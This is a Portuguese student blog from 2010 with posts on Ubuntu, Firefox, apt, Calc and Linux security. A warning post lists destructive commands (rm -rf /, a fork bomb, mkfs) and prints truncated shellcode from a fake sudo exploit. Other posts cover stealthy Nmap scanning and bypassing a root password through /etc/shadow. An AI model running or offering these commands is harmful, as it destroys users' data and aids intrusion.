Pesquisar este blog

sexta-feira, 9 de julho de 2010

Firefox será o navegador padrão da IBM


A IBM definiu o Firefox como seu browser padrão. É o que anunciou na quinta-feira, 01, o vice-presidente de Linux e software open source da empresa, Robert Sutor, em seu blog pessoal.

O executivo não diz qual era o browser padrão antes dessa decisão, ou mesmo se existia algum, mas seja qual for o programa utilizado por um dos mais de 400 mil funcionários, ele será encorajado a mudar para o Firefox, afirmou.

“Alguns dos programas que usamos não os deixariam surpresos já que nós mesmo que os produzimos, como o Lotus Notes, o Lotus Sametime e o Lotus Symphony. Bem, estamos adicionando mais um software na nossa lista de aplicativos padrão: o Mozilla Firefox”, enfatizou Sutor.

Entre os motivos enumerados pelo executivo para a adoção do navegador estão a compatibilidade, o funcionamento por padrões abertos, o fato de ser open source e as extensões que o tornam customizável, segundo informações do IDG Now!.

Sutor ainda destacou entre as razões da escolha o desenvolvimento por uma comunidade sem relação com corporações. Seria o argumento mais interessante, visto que o Chrome, mesmo sendo open source, pertence à Google; o Internet Explorer é controlado pela Microsoft; e o Safari é desenvolvido pela Apple; restando apenas o Opera, que está a cargo de uma empresa privada, a Opera software.

O executivo, no entanto, não deixa de esclarecer que realmente considera o Firefox mais avançado que seus rivais.

“Enquanto alguns navegadores surgem e outros deixam de existir, o Firefox continua sendo o padrão de qualidade sobre o que um navegador aberto, seguro e compatível deva ser. Sempre aparecerá um que seja mais rápido, outro com mais recursos, mas aí virá um terceiro ainda melhor, incluindo aí o próprio Firefox”, elogiou.

quinta-feira, 24 de junho de 2010

Versões Ubuntu


Sobre a Numeração:

A numeração das versões do Ubuntu são relacionadas com sua data de lançamento. No formato A.MM, ou seja, o primeiro dígito é o ano de lançamento, o segundo é o mês.

Sendo assim, é incorreto falar 8.1 se referindo à versão 8.10, pois o mês lançado foi Outubro e não Janeiro. Versões que já temos:


Ubuntu 4.10: primeira versão do Ubuntu, lançada em 20 de Outubro de 2004.

Ubuntu 5.04: versão que fez a fama do Ubuntu, lançada em 8 de Abril de 2005.

Ubuntu 5.10: lançada em 13 de Outubro de 2005.

Ubuntu 6.06 LTS: primeira versão com Longo Tempo de Suporte1, lançada em 1 de Junho de 2006.

Ubuntu 6.10: versão com reformas estruturais, lançada em 26 de Outubro de 2006.

Ubuntu 7.04: lançada em 19 de Abril de 2007.

Ubuntu 7.10: primeira versão com o Desktop 3D ativado por padrão, lançada em 18 de Outubro de 2007.

Ubuntu 8.04 LTS: segunda versão com Longo Tempo de Suporte, lançada em 24 de Abril de 2008.

Ubuntu 8.10: lançada em 30 de Outubro de 2008.

Ubuntu 9.04: lançada em 23 de Abril de 2009.

Ubuntu 9.10: lançada em 29 de Outubro de 2009.

Ubuntu 10.04 LTS: terceira versão com Longo Tempo de Suporte, lançada em 29 de Abril de 2010.


Sobre os Nomes:

Os nomes das versões são "apelidos" dados pelo time de desenvolvimento do Ubuntu, para chamar, de forma mais familiar, as versões [à serem] lançadas.

Os nomes, para muitos, são considerados aberrações e, realmente, a equipe do Ubuntu tem um gosto meio exótico no que se refere a eles. Sempre é usado o modelo "The + Adjetivo + Animal". No nosso bom português, o nome das versões seriam:

Ubuntu 4.10: The Warty Warthog (O Porco-Africano Verruguento)

Ubuntu 5.04: The Hoary Hedghog (O Ouriço Grisalho)

Ubuntu 5.10: The Breezy Badger (O Texugo Fresco)

Ubuntu 6.06 LTS: The Dapper Drake (O Pato Doméstico Estiloso)

Ubuntu 6.10: The Edgy Eft (A Salamandra Hi-Tec)

Ubuntu 7.04: The Feisty Fawn (O Jovem Bravo Cervo)

Ubuntu 7.10: The Gutsy Gibbon (O Macaquinho Corajoso)

Ubuntu 8.04 LTS: The Hardy Heron (A Garça Durona)

Ubuntu 8.10: The Intrepid Ibex (O Bode Intrépido)

Ubuntu 9.04: The Jaunty Jackalope (O Coelho Elegante)

Ubuntu 9.10: The Karmic Koala (O Koala Kármico)

Ubuntu 10.04 LTS: The Lucid Lynx (O Lince Lúcido)








Publicado por:Danieli,Larissa,Líris,Marcelo e Marina

sexta-feira, 18 de junho de 2010

Segurança do LINUX

O Linux é seguro?
Muito falamos a respeito da segurança do Sistema Operacional Linux, mas bem sabemos que o Linux também têm suas vulnerabilidades. Quais? As da Microsoft parece que todo linuxer sabe de cor, mas e as vulnerabilidades do próprio sistema operacional?
Pois é. Aqui vai o alerta. Um dia escutei a frase: O Sistema Operacional mais seguro é aquele que você mais domina., e tive que concordar plenamente. Pesquisando então sobre as vulnerabilidades do Linux, esperando encontrar pouca coisa, achei muita gente relatando seus problemas. Até que encontrei no site da SANS (http://www.sans.org/top20) uma pesquisa realizada pela própria SANS junto ao FBI e pude esclarecer esta minha dúvida. A pesquisa aborda as 20 maiores vulnerabilidades encontradas, 10 para servidores Windows e 10 para servidores Unix.
As brechas do Linux
Abaixo estão listadas as 10 maiores vulnerabilidades do Sistema Operacional Linux/Unix, traduzido de Outubro de 2003 e que são válidas ainda hoje:
BIND - O BIND é o principal serviço de ataque dos hackers. A maioria dos bugs já foram resolvidos mas a maioria das pessoas mantém as versões mais antigas por uma questão de funcionalidade e por não disporem de tempo para a migração.
RPC - O RPC é um serviço para a chamadas de procedimentos que serão executados remotamente. É extremamente importante para a funcionalidade da rede interna pois é utilizado para distribuição de carga, processamento distribuído, cliente/servidor, etc. O NFS, que é um dos compartilhamentos de rede mais conhecidos e utilizados, usa diretamente o RPC.
Apache - Sem dúvidas nenhuma é um Web Server bem mais robusto que o IIS, mas não deixa de estar exposto à internet. Vários ataques a sistemas operacionais NIX ocorrem pelo Apache, principalmente para servidores com execução de scripts e permissões de acesso à programas.
Contas de usuários - Esta vulnerabilidade ocorre principalmente sobre contas com senhas fracas ou nulas. Parece ridículo, mas tem pessoas que conseguem invadir sistemas descobrindo senhas pelo método da tentativa e erro, e, geralmente, as senhas são as mais óbvias possíveis. Não é o sistema que é hackeado mas a conta do usuário. Uma vez tendo acesso ao sistema, o hacker pode se tornar bastante incômodo.
Serviço de transferência em ASCII - FTP e e-mail são os programas diretamente relacionados a estes serviços. Tudo que passar por eles e for texto puro, não encriptado (o que ocorre na maioria das instalações), o conteúdo pode ser capturado. Basta alguma informação ou senha secreta para que a porta esteja aberta.
Sendmail - É, talvez, o pior serviço de e-mail do NIX, em comparação com os seus próprios concorrentes. Tende a ser lento e problemático. Mas é o mais utilizado, porque é extremamente operacional. É possível colocá-lo para funcionar rapidamente. Por isto é a maior fonte de furos existente na comunidade. Se puder, substitua.
SNMP - Uma excelente ferramenta administrativa, principalmente para grandes corporações. Mas por ser um projeto baseado na comunicação com a rede, está sujeito à vulnerabilidades. O serviço é ativado por default no sistema Linux, o que causa o esquecimento por parte dos usuários.
SSH - É a solução ideal para acesso remoto seguro, abolindo de vez o Telnet. No entanto, pode se tornar totalmente ineficaz se não for administrado corretamente. Escolha o nível de segurança mais desejado, lembrando que ele é diretamente proporcional ao trabalho para configurá-lo. E não esqueça de proteger chaves privadas dos usuários!
Compartilhamento de arquivos - Ocorre principalmente com NIS/NFS e Samba mal configurados. Podem comprometer a segurança abrindo brechas para ataques externos.
SSL's - Embora sejam extremamente eficazes para criar conexões seguras entre cliente/servidor, os SSL's permitem o acesso ao servidor por parte do cliente. Pode se tornar uma porta para o acesso de hackers
NÃO CONFIE DEMAIS NA SUA SEGURANÇA. A desconfiança é o melhor aliado de um bom administrador.


Estou sem a senha de root do meu Linux, e agora?
Os exemplos abaixo são comuns em casos que precisamos da senha:
Para continuar o trabalho de um administrador de rede que perdeu o serviço de manutenção de um servidor e não deu a senha de root.
Para resolver um problema de invasão, quando alguém descobre a senha do root, muda, e passa a brincar com o seu servidor;
Quando você usou um teclado ruim para mudar a senha do root. Já aconteceu comigo também. Mudei uma senha de root remotamente num PC cujo teclado não funcionava a tecla 7. É claro que mesmo pedindo confirmação, digitei a senha errada (sem saber) duas vezes e assim ficou. No dia que tentei entrar diretamente no servidor a senha não funcionava;
A mais comum: quando esquecemos a senha.
O processo
Na verdade, para quebrar a senha do root temos que editar o arquivo /etc/shadow e apagar os caracteres referentes a senha do root. É SÓ ISSO E PRONTO! O que disserem a mais é perda de tempo.
Para isso você deve dar o boot por uma distribuição live ou um disquete. Neste artigo vou dar o exemplo de uma distribuição live. Pode ser Ubuntu, Kurumin ou qualquer outra. No meu caso usei o Conectiva Live 10.
As distribuições live já montam a partição referente ao HD da máquina, mas a maioria monta como somente leitura, ou seja, você pode ver os arquivos mas não pode salvar nada. Temos então que alterar esta propriedade para permitir leitura/gravação. Ou você faz isso pelo modo gráfico facilmente, ou desmonta e monta de novo, que foi o que fiz.

Grupo Gabriel,Julio,Carlos

quarta-feira, 9 de junho de 2010

Linux Educacional. Você conhece ?


O linux é um sistema operacional, ou seja, ele é responsável pela interface homem máquina. Foi desenvolvido inicialmente por um estudante finlandês Linus Trovalds em 1991 baseado no sistema operacional Unix e hoje é mantido por comunidades internacionais de programadores, outros profissionais na área de informática, etc.


Já o linux educacional é uma compilação do linux (distribuição debian) com foco em aplicação a laboratório de informática educacional (LIE) e escolas.
Em sua versão 1.0 traz como interface gráfica o KDE 3.5, além de softwares educacionais vem também com aplicativos de uso geral como a suíte de escritório BrOffice.org 2.0, software para gravação de CD/DVD k3b 3.5.5, o browser Iceweasel 2.0.0.3 entre outros.



Caso tenha interesse em testar esta distribuição o download poderá ser feito no site http://www.webeduc.mec.gov.br, box do Proinfo.


(Líris, Marina, Marcelo, Larissa)

quinta-feira, 27 de maio de 2010

apt-get vs. aptitude

Você, usuário do Ubuntu, Linux Mint e outras distros baseadas no Debian, já deu seu sudo apt-get update hoje? Ou prefere sudo aptitude update? Tanto faz? O apt-get e o aptitude são bastante parecidos, mas é bom saber que há diferenças importantes entre as ferramentas.
Ambos são frontends para o dpkg, o sistema de gerenciamento de pacotes do Debian, e como tal herdado pelas distros filhas. O aptitude nasceu como uma interface orientada a menus em modo terminal, mas também pode (e deve) ser utilizado na linha de comando. O apt-get, por seu turno, faz parte de um conjunto (o qual inclui ainda o apt-cache, o apt-file e o apt-cdrom) de comandos de terminal, e portanto não tem nada parecido com “menuzinhos”.
Se ambos podem ser utilizados praticamente da mesma forma, então qual a diferença entre eles? Vamos aos fatos.

Atualização do cache de pacotes (apt-get update vs. aptitude update)

Para essa tarefa, prefiro o aptitude, pelo simples fato de que, após atualizar o cache de pacotes, ele mostra a contagem de pacotes novos e atualizáveis. Com isso, é possível saber se será necessário dar um aptitude safe-upgrade (ou aptitude dist-upgrade) na sequência para manter o sistema atualizado, sem emitir esse comando.

Gerenciamento de dependências quebradas

Outro ponto em que o aptitude é melhor que o apt-get. Ao tentar instalar um pacote (com aptitude install ), e caso haja pacotes quebrados (ou seja, com dependências não satisfeitas), o aptitude se prontifica a consertá-los, enquanto o apt-get se limita a dizer que é necessário executar o comando apt-get install -f antes de tentar instalar qualquer pacote. Se as sugestões de conserto do aptitude funcionam 100% das vezes, isso já é outra história. Mas pelo menos ele tenta.

Expressões regulares nos nomes dos pacotes

Para isso o apt-get é rei. Vira e mexe, lá estou eu desinstalando e instalando o X Server e todos os drivers de vídeo. O nome do pacote do X Server é xserver-xorg, e os drivers de vídeo seguem o padrão xserver-xorg-. Com o apt-get, é possível executar apt-get remove (ou install) xserver-xorg*, mas com o aptitude, não . Com aquele, consigo (des)instalar todos os pacotes citados com uma única linha de comando.

Limpeza automática de pacotes não mais necessários

Se algum pacote se tornar desnecessário ou obsoleto, o aptitude o removerá automaticamente em sua próxima execução, sem sequer questionar o usuário. O apt-get se adstringe a informar que é preciso executar apt-get autoremove (?!) para se livrar do lixo.

Procurando por pacotes (apt-cache search vs. aptitude search)

Nisso a diferença é puramente cosmética. O aptitude search devolve as informações em colunas alinhadas, mais fáceis de ler.

Fonte:
Goncin


Alessandra e Natália

segunda-feira, 17 de maio de 2010

Usando o Nmap


O Nmap é um portscan de uso geral, que pode ser usado, sempre que você precisar verificar rapidamente as portas abertas em determinado host, seja na sua rede local, seja na Internet.

O Nmap é um pacote muito utilizado e por isso está disponível em todas as principais distribuições. Você pode instalá-lo usando o yast (SuSE), yum (Fedora), urpmi (Mandriva), ou outro gerenciador de pacotes disponível. Nas distribuições derivadas do Debian, você pode instalá-lo via apt-get:

# apt-get install nmap

Para usar todos os recursos do Nmap, você deve executá-lo como root. O uso mais simples é escanear diretamente uma máquina da rede, como em:

# nmap 192.168.0.3
Starting nmap 3.81 ( http://www.insecure.org/nmap/ )

Interesting ports on 192.168.0.3:

(The 1661 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

68/tcp open dhcpclient

631/tcp open ipp

MAC Address: 00:0F:B0:55:EE:16 (Compal Electronics)

Nmap finished: 1 IP address (1 host up) scanned in 0.339 seconds

Neste exemplo, o teste foi disparado contra uma máquina Linux, rodando uma instalação personalizada do Debian Sarge. As duas portas abertas são o cliente DHCP (é normal que a porta 68 fique aberta em clientes configurados via DHCP) e o servidor Cups, que escuta na porta 631. O Cups mantém esta porta aberta sempre que é ativado (você precisa dele para imprimir, tanto em compartilhamentos da rede, quanto em impressoras locais). Por padrão, ele permite apenas que o localhost imprima e acesse a interface de administração, mas é possível configurá-lo para compartilhar as impressoras com a rede de forma bem simples através do arquivo "/etc/cups/cupsd.conf".

Nem o cliente DHCP nem o Cups permitem acesso via shell, por isso, salvo eventuais graves brechas de segurança, os ataques mais graves que poderiam ser lançados neste caso seriam tentar modificar a configuração de rede, tentando responder ao cliente DHCP no lugar do servidor DHCP da rede, ou tentar usar impressoras compartilhadas no Cups.

O simples fato de uma determinada porta estar aberta, não significa que a máquina está vulnerável, mas apenas que existem serviços ativos e as portas não estão sendo bloqueadas por nenhum firewall.

Você pode obter mais informações sobre as portas abertas, incluindo a versão de cada serviço ativo usando a opção "-sV", como em:

# nmap -sV 192.168.0.3

Esta opção é muito mais demorada, no lugar dela você pode preferir fazer logo um scan completo usando o Nessus.

É possível também escanear de uma vez toda uma faixa de endereços, como em:

# nmap 192.168.0.1-254

Outro parâmetro interessante é a opção "-O", que faz com que o Nmap tente identificar qual é o sistema operacional usado em cada máquina. Esta identificação permite diferenciar máquinas rodando diferentes versões do Windows de máquinas rodando Linux ou MacOS, por exemplo, mas não é muito eficiente em identificar diferentes distribuições Linux, nem em identificar a versão do Windows usada. Veja um exemplo:

# nmap -O 192.168.0.4
Starting nmap 3.81 ( http://www.insecure.org/nmap/ )

Interesting ports on 192.168.1.35:

(The 1658 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

5000/tcp open UPnP

MAC Address: 02:0F:B0:55:EE:16 (Unknown)

Device type: general purpose

Running: Microsoft Windows 95/98/ME|NT/2K/XP

OS details: Microsoft Windows Millennium Edition (Me),

Windows 2000 Pro or Advanced Server, or Windows XP

Nmap finished: 1 IP address (1 host up) scanned in 1.145 seconds

Neste caso temos uma instalação limpa do Windows XP, sem o firewall ativo. Note que a identificação do sistema não é exata, o Nmap indicou corretamente que é uma máquina Windows, mas não soube identificar precisamente a versão.

Continuando, os scans do Nmap podem ser facilmente detectados caso alguma das máquinas-alvo esteja com o Snort, ou outro detector de intrusões ativo, o que vai lhe render no mínimo um puxão de orelha do administrador da rede. Para dificultar isso, o Nmap oferece a opção de fazer um half-open scan, especificando a opção "-sS", como em:

# nmap -sS 192.168.0.1-254

Operando neste modo, o Nmap apenas envia um pacote SYN para cada porta alvo e espera para ver se recebe um pacote ACK de confirmação sem, entretanto, responder com o segundo pacote ACK, que abriria a conexão. Isso permite burlar muitos programas de detecção de intrusão, que monitoram e logam apenas conexões efetivamente estabelecidas.

Apesar de menos comum, é possível fazer também uma varredura de portas UDP abertas. Embora poucos serviços possam ser diretamente conectados através de portas UDP, muitos as utilizam para transferir dados e, em geral, os firewalls são configurados para bloquear apenas as portas TCP. Escanear as portas UDP é uma forma alternativa de detectar serviços abertos em uma máquina, mesmo que todas as portas TCP estejam fechadas no firewall. Existem também casos de backdoors acessíveis via UDP, como o Back Orifice (no Windows) e até mesmo (raras) brechas de segurança em serviços do Linux ou outros sistemas Unix, como uma brecha em certas versões do rpcbind do Solaris, que podia ser explorada através de uma porta UDP alta, a partir da 32770 (variando de acordo com a versão).

Os scans de UDP são rápidos se direcionados a máquinas Windows, mas são absurdamente lentos se feitos contra máquinas Linux ou BSD, onde o sistema limita o número de erros de ICMP (dos quais o scan do Nmap depende) a uma taxa de aproximadamente 20 por segundo. No Windows não existe limite.

Para usar o scan UDP, usamos a opção "-sU", como em:

# nmap -sU 192.168.0.4

Por padrão, o Nmap escaneia apenas um conjunto de 1661 portas, que incluem as usadas pelos serviços mais comuns. Uma media de segurança comum é esconder serviços como o SSH em portas altas, de forma que eles sejam mais difíceis de detectar. Nesses casos, você pode fazer um scan completo, incluindo todas as portas TCP (ou UDP) usando a opção "-p 0-65535", como em:

# nmap -sS -p 0-65535 192.168.0.4

A opção "-p" pode ser usada para escanear apenas uma porta específica, ou uma faixa de portas em que esteja interessado. Se executado via rede local, o scan é sempre relativamente rápido (a menos que a máquina-alvo esteja com um firewall ativo, configurado em modo "DROP"), mas, via Internet, as coisas tornam-se bem mais demoradas. Ao tentar localizar vulnerabilidades em uma determinada faixa de endereços IP, você começaria lançando o teste rápido contra toda a faixa, reservando as opções mais demoradas para algumas máquinas específicas.

A opção "-sS", combinada com a "-p 0-65535", permite localizar serviços escondidos em portas altas, mas não é capaz de dizer muito sobre eles. Ele sempre retorna algo como:

22543/tcp open unknown

Você pode escanear esta porta específica usando a opção "-sV" para descobrir mais sobre ela, como em:

# nmap -sV -p 22543 192.168.0.4

PORT STATE SERVICE VERSION

22543/tcp open ssh OpenSSH 3.8.1p1 Debian-8.sarge.4 (protocol 1.99)

Nmap finished: 1 IP address (1 host up) scanned in 0.284 seconds

Agora você sabe que a máquina tem ativo um servidor OpenSSH (versão 3.8.1, do Debian Sarge), escondido na porta 22543.

Tudo é muito simples quando a máquina alvo não possui nenhum firewall ativo. O scan é rápido e você pode lançar toda sorte de ataques sobre os serviços ativos. Mas, com um firewall ativo, as coisas tornam-se um pouco mais complicadas e demoradas. Um firewall configurado para descartar (DROP) todos os pacotes recebidos, faz com que o scan torne-se extremamente lento.

Versões antigas do Nmap não chegavam sequer a concluir o teste quando o alvo estava configurado desta forma, retornando uma mensagem como:

Starting nmap 3.50 ( http://www.insecure.org/nmap/ )

Host 192.168.0.33 appears to be down, skipping it.

Note: Host seems down.

Nmap run completed -- 1 IP address (0 hosts up) scanned in 12.053 seconds

Nestes casos, você pode forçar o Nmap a concluir o teste, a fim de detectar serviços escondidos em portas altas usando o parâmetro "-P0", como em:

# nmap -sS -P0 -p 0-65535 192.168.0.4

O problema neste caso é que o scan demora muito mais que o normal, já que, por não receber respostas, ele precisa aguardar um tempo muito maior antes de passar para a porta seguinte. Um teste executado contra um micro na Internet, através de uma conexão lenta, pode literalmente demorar dias. Apesar de não responder, o micro remoto pode ser configurado para logar suas tentativas, permitindo que o administrador tome conhecimento e aja de acordo, bloqueando seu endereço IP ou contatando seu provedor de acesso. Um firewall bem configurado é realmente uma grande vantagem de segurança para qualquer servidor.

http://www.guiadohardware.net/dicas/usando-nmap.html

Grupo : André,Iago,Victor,Vitor,Wellington

quinta-feira, 13 de maio de 2010


Open Office Calc
“Use o Calc para manter seus números sob controle. Essa poderosa planilha eletrônica possui todos os recursos de que você precisa para calcular, analisar, resumir e apresentar seus dados em relatórios numéricos ou em impressionantes gráficos. Um sistema de ajuda integrada facilita a inserção de fórmulas complexas. Sofisticadas ferramentas para auxílio à tomada de decisão estão a poucos cliques de distância. Importe dados externos usando a Tabela Dinâmica. Depois os ordene, filtre-os, produza subtotais e análises estatísticas. Use visualizações prévias para escolher entre treze categorias de gráficos, incluindo linhas, áreas, colunas, pizza, XY, rede e diversas variantes.” Iniciando o OpenOffice Planilha
Clique em Iniciar/Programas/OpenOffice.org 2.0/OpenOffice.org Calc ou caso já estejautilizando outro aplicativo do OpenOffice clique em Arquivo/Novo/Planilha na Barra de Menu.Colunas e linhas: São as coordenadas utilizadas para a localização das células. As colunas são apresentadas na vertical e são nomeadas por letras de A até Z e de AA até IV, num total de 256 colunas. As linhas apresentadas na horizontal são nomeadas por números, num total de 65.536 linhas. Células: São as unidades de inserção de dados. Nelas podem-se inserir textos, números, fórmulas ou funções. Célula Ativa: É a célula que está em edição, isto é, onde se está inserindo um dado. Para ativar uma célula dê um clique sobre a mesma.
Entrada de dados na planilha
Para inserir um dado na célula clique na mesma para selecioná-la e digite o dado desejado. Caso digite um texto que ultrapasse o tamanho da célula, clique na mesma para selecioná-la e clique em Formatar/Coluna/Otimizar Largura.
Inserindo Fórmula
Uma fórmula permite fazer correlação entre as células, possibilitando a realização de operações matemáticas, entre outras opções. O processo para inserir uma fórmula em uma célula é o mesmo utilizado para o texto. Toda fórmula deve começar com o sinal de = (igual). Exemplo: Se você digitar na célula D5 a seguinte fórmula: = B5*C5 (indica que o conteúdo da célula B5 será multiplicado pelo conteúdo da célula C5 e o resultado será apresentado na célula D5). Você poderá utilizar o Assistente de Função clicando em Inserir/Função.
Formatando Células
Neste comando pode-se definir as configurações de uma ou mais células especificadas, tais como o tamanho e tipo da letra, o alinhamento, o plano de fundo, aborda, etc.Para acioná-lo:Clique na Barra de Menu em Formatar/Célula Em seguida, será aberta a janela Formatar Célula, com várias pastas que permitem trabalhar com a formatação das células.Conheça suas funções:• Número Nesta pasta , o usuário pode definir o formato dos números: formato de moeda, porcentagem,hora,data,científico etc., além do idioma a ser usado para a célula especificada.• FonteNesta pasta, pode-se definir o tamanho da letra, a fonte (tipo de letra), a cor, o idioma, e os atributos pertencentes ao efeito do caracter.• AlinhamentoNesta pasta, pode-se definir a posição horizontal e vertical do texto na célula( justificado,centrado,direita, esquerda), a posição da escrita na célula (Horizontalmente,verticalmente ou inclinado).• BordasNesta pasta, há a opção de configurar a borda de uma ou mais células especificadas, alterando a espessura da linha da borda, a opção de sombra e a cor da linha.• Plano de FundoNesta pasta, há a possibilidade de definir a cor do fundo do caracter.
Criando Gráfico
Para criar um gráfico através de uma tabela já existente proceda da seguinte maneira:Selecione a tabela dentro da folha de cálculo;Clique na Barra de Menu Inserir/Gráfico.No campo “Área” já aparece selecionada a tabela.Clique em Próximo.Neste campo escolha o tipo de gráfico e a ordem dos dados:se serão em linhas ou por colunas.Clique em Próximo.Neste campo escolha o modelo do gráfico escolhido.Clique em Próximo.Nesta janela é possível incluir o título do gráfico e legenda.Em seguida clique em Criar para criar o gráfico.

Fonte: tutorzone.com.br
grupo:Anyele,Daniela,Danieli,Ingrid e Taísa

sábado, 8 de maio de 2010



Ubuntu 10.04 Lançado!

Sim. A nova versão do Ubuntu já foi lançada com muitas novidades. Dentre elas estão:

~> O Mozilla Firefox , para uma rápida, segura a navegação na web. Você também pode escolher navegadores alternativos de código aberto a partir do Ubuntu Software Centre.

~> O OpenOffice.org, que é totalmente compatível com o Microsoft Office e tem tudo que você precisa para criar documentos profissionais, planilhas e apresentações. É fácil de usar e completamente livre.

~> O Ubuntu Software Centre oferece acesso instantâneo a milhares de aplicativos gratuitos de código aberto. Nas categorias de software você poderá encontrar várias categorias, tais como: educação, jogos, som e vídeo, material gráfico, programação e escritório. Software é fácil de encontrar, fácil de instalar e fácil de remover. O Ubuntu Software Centre também oferece centenas de jogos, incluindo os quebra-cabeças, aventuras, desafios táticos e muito mais. Todos livres de escolher e de uso livre.

~> Chat e E-mail: Integre rapidamente o seu bate-papo contas do Yahoo, Gmail, MSN, Jabber, AOL, QQ e muitos mais. Evolution Mail fornece e-mail de maneira fácil e intuitiva.

~> Novo Ubuntu Me Menu permite que você acesse seu Facebook e no Twitter (e mais) imediatamente.

~> A nova versão inclui uma ferramenta em que você pode comprar e baixar músicas.

~> A nova versão Ubuntu carrega mais rapidamente em qualquer computador, mas é super-rápido em máquinas mais recentes. Depois de carregar, abrir um browser leva apenas alguns segundos, ao contrário de outros sistemas operacionais que deixá-lo olhando para a tela, esperando para entrar online.

Para mais informações acesse http://www.ubuntu-br.org/. Lá você poderá obter mais informações sobre a nova versão (em inglês), além de poder baixar e solicitar o seu CD.

Grupo: Anyele, Daniela, Danieli, Ingrid, Taísa
=D

sexta-feira, 30 de abril de 2010

NUNCA REPITA ESSES COMANDO NO LINUX

Linux é poderoso e divertido. Quando se trata de algo com muito poder, vale lembrar o conselho do tio Ben ao jovem Peter Park:

"Com grandes poderes, vem grandes responsabilidades"

Quando se é novo no Linux, frequentemente procuramos obter ajuda de outros e quase a maioria dos conselhos que você receberá será na forma de alguns comandos como ps, top, modprobe, lspci.

Tenha cuidado quando você executar esses comandos, infelizmente existem alguns anti-Linux a serviço do mal, malucos invejosos que tentam enganar novos usuários com dicas e tutoriais falsos, como nesse fórum:

* A list of tutorials for Ubuntu (NÃO EXECUTE ESSES COMANDOS)


Se você seguir estas dicas e executar esses comandos, perderá todos os seus arquivos, e ninguém será culpado a não ser você. Esteja consciente do que você está fazendo!

Não faça de todas instruções como em uma receita de bolo, seguindo a risca sem saber o que está fazendo. Use as man pages, elas estão aí para isso (manuais do Linux, em um terminal digite: "man comando", o manual será mostrado na tela. EX: man mplayer).

Desta forma você aprenderá a aproveitar muito mais as opções que o Linux te dá.

Se você estiver em dúvida sobre os comandos que te passaram, entre aqui no VOL e coloque todos os comandos suspeitos e informações sobre o que você quer fazer, tipo assim:

"Olá, eu estava tentando fazer isso e um rapaz do forum.xyz.com me disse para executar esse comando (rm -Rf /). Suspeito que este seja um comando nocivo. Alguma sugestão?"

Guarde as minhas palavras, a comunidade tem um grande espírito de união, o espírito de compartilhar conhecimentos. Você terá boas sugestões, bem explicativas, muito rapidamente, eu mesmo já postei para alguns novatos respostas dentro de minutos após eles colocarem as perguntas aqui no VOL.

Se você ainda estiver em dúvida, sugiro que execute os comandos dentro do VirtualBox. Isso mesmo, estou falando para os novatos instalarem um Linux dentro de outro Linux criando uma máquina virtual. Não é uma tarefa difícil e existe vastas informações sobre isso aqui mesmo no VOL. Assim você pode testar quantos comandos e configurações quiser sem se preocupar em detonar o seu sistema.

Agora chega de blá blá blá, vamos aos 5 comandos perigosos que o maluco do fórum mandou as pessoas executarem. NÃO EXECUTE ESSES COMANDOS! Eles são apenas para sua informação. Esses comandos não são feitos para fazer mal ao seu computador, mas com um par de opções, pode ser muito perigoso.

O Linux não sabe que dentro de uma pasta do seu diretório home existe a foto da sua namorada. É o seu dever garantir que esses e outros arquivos fiquem seguros.

PRIMEIRO COMANDO (Ñ REPITA ESSES COMANDOS)

Vamos começar. Repito, NÃO EXECUTE ESSES COMANDOS. Se você quiser testar, sugiro-lhe executá-los dentro de uma máquina virtual (VirtualBox).

1. O rei de todos os males:

# rm -rf /

P. O que faz um rm?
A. Remove um arquivo

P. O que é r?
A. Recursão. Isso significa que dentro de uma pasta, de outra pasta naquela pasta e assim por diante.

P. O que é f?
A. Force. Isso significa que você está dizendo para o comando: "Nunca me perguntar nada. Basta fazer o que eu mandar fazer".

P. O que é /?
A. Seu diretório raiz!

Veja o que o comando faz: recursivamente remove todos os arquivos dentro do seu diretório raiz sem chatear você - "Devo apagar isso, sim ou não?".

Existem várias versões do rm disponíveis, tais como:

# rm -rf .
# rm -rf *

Pouco conhecimento é perigoso!

Que tal isso? Como você faria para apagar todos os arquivos ocultos de uma pasta, sabendo que os arquivos ocultos no Linux começam com .? Você poderia pensar em um comando como esse:

# rm - .*

Nããããããoooooo!

Esse comando irá apagar todos os arquivos um nível acima do diretório atual.

SEGUNDO, TERCEIRO E QUARTO COMANDO (Ñ REPITA ESSES COMANDOS)

2. Como fazer um backup do seu diretório home ou algumas pastas? Nunca tente fazer qualquer coisa como:

# mv /home/seunome/* /dev/null

P. O que é mv?
A. Mover arquivos.

P. O que é /dev/null?
A. Nulo, não significa nada. Em outras palavras, é um buraco-negro.

Se você executar o comando acima ele irá mover todos os arquivos dentro do seu diretório home para um buraco-negro, Hasta la vista baby!

3. Terminal Linux não é um brinquedo, é algo para aprender e fazer coisas produtivas. Eu só queria avisar que você não deve escrever nada bobo e apertar ENTER como esta bobagem:

:(){:|:&};:

Esses rostinhos, que mais parecem aqueles usados em chat, parecem inofensivos, mas no terminal eles são comandos. O comando acima executa processos diferentes causando o congelamento de seu computador. Você obterá uma espécie de "Blue Screen of Death", "Tela Azul da Morte"! ( usuários do Windows conhecem ela muito bem).

4. Que tal criar um sistema de arquivos do Linux?

# mkfs.ext3 /dev/sda

Os dados de seu disco rígido sumirão e nunca voltarão. Isso foi uma festa de despedida para seus documentos, você acabou de executar algo similar a um "format C:\*.*".

QUINTO COMANDO E FINALIZAÇÃO(Ñ REPITA ESSES COMANDOS)

#### NÃO SE ATREVA A COMPILAR ISSO E EXECUTAR ######
#### ESSE CÓDIGO LOCO FOI TIRADO DA SEGUINTE PAGINA ####
#### http://seclists.org/fulldisclosure/2007/Aug/0071.html ####
/*
* off by one ebp overwrite in sudo prompt parsing
function
* discovered by beyond security in 2007, thx ge
*
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
*
* please use responsibly! a patch has already been
sent
* upstream and a fix will be included in the next
sudo release
*
*/
#include
#include
#include
#include
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
